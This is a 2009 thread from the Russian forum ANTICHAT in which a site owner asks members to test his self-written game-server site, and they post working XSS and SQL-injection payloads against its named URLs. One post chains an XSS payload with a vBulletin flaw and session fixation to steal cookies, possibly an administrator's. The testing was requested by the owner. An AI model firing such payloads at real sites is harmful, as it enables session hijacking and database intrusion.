ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
13.11.2009, 17:42
|
|
Познавший АНТИЧАТ
Регистрация: 22.11.2007
Сообщений: 1,822
Провел на форуме:
4468361
Репутация:
1549
|
|
l2faust.ru
проверьте двиг. самописное. у кого замечания не по теме - пишем ПМ.
|
|
|
13.11.2009, 18:43
|
|
Познающий
Регистрация: 27.03.2009
Сообщений: 40
Провел на форуме:
1191962
Репутация:
39
|
|
XSS
Уязвимо поле Логин или вот так http://l2faust.ru/acc/index.php?do=retry&login="><script>alert()</script>
|
|
|
|
13.11.2009, 20:16
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Не только логин ..
// Мда, ну и нахрена была постить полуметровый скриншот, если можно просто написать, что и поле "Секретный вопрос" так же уязвимо?
BlackSun.
Последний раз редактировалось BlackSun; 13.11.2009 в 20:30..
|
|
|
|
13.11.2009, 21:54
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
http://l2faust.ru/index.php?lang=ru%60+from+%60newstbl%60+union+sele ct+1,2,version()/*&act=news
MySql-inj
Сначала lang пишеться в сессию... потом учавствует в выборке.
Version():5.0.45-log
--------------------------------------------------
Регистрация->все поля не фильтруються(пост пассивки)
Поле секретного вопроса даст активку при востановлении пассворда..
Последний раз редактировалось S00pY; 13.11.2009 в 22:26..
|
|
|
|
17.11.2009, 13:44
|
|
Новичок
Регистрация: 23.12.2008
Сообщений: 18
Провел на форуме:
311387
Репутация:
7
|
|
http://l2faust.ru/acc/index.php?do=register
при регистрации во все поля добавить "><script>alert()</script> и нажать регистрация!!! И мы увидим 4 алерта  XSS |
|
|
|
19.11.2009, 23:38
|
|
Познавший АНТИЧАТ
Регистрация: 22.11.2007
Сообщений: 1,822
Провел на форуме:
4468361
Репутация:
1549
|
|
Сообщение от XenkoK
http://l2faust.ru/acc/index.php?do=register
при регистрации во все поля добавить "><script>alert()</script> и нажать регистрация!!! И мы увидим 4 алерта XSS второй пост этой темы почитай.
Ребят, умнички.
ща пофиксим и неплохо было бы перепроверить 
|
|
|
|
06.12.2009, 23:48
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596
Репутация:
88
|
|
XSS
В пост запросе http://l2faust.ru/acc/index.php
Поля: regLogin, regAnswer, regQuestion, regEmail
Подставляем
1"+onmouseover=alert(12345)+
|
|
|
|
07.12.2009, 00:20
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596
Репутация:
88
|
|
Так же в купе с уязвимостью vBulletin, публичной (поле веб адреса пользователя не фильтруется) и фиксацией сессии, конструируем типа такой ссылки:
http://l2faust.ru/acc/index.php?do=register®Login=1"+onmouseover=aler t(document.cookie)+
и вставляем в своем профиле на форуме, теперь при нажатии получаем куки, собственно если постараться то возможно и админа можно заполучить
Последний раз редактировалось AKYLA; 07.12.2009 в 00:24..
|
|
|
|
07.12.2009, 11:23
|
|
Познавший АНТИЧАТ
Регистрация: 22.11.2007
Сообщений: 1,822
Провел на форуме:
4468361
Репутация:
1549
|
|
ок спасибо. ребят, спасибо, но давайте так. впредь перед тем, как юзать експлойты - вы меня предупреждайте, чтобы я хостера предупредил, а то они чуть не забанили подсеть с которой была атака.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
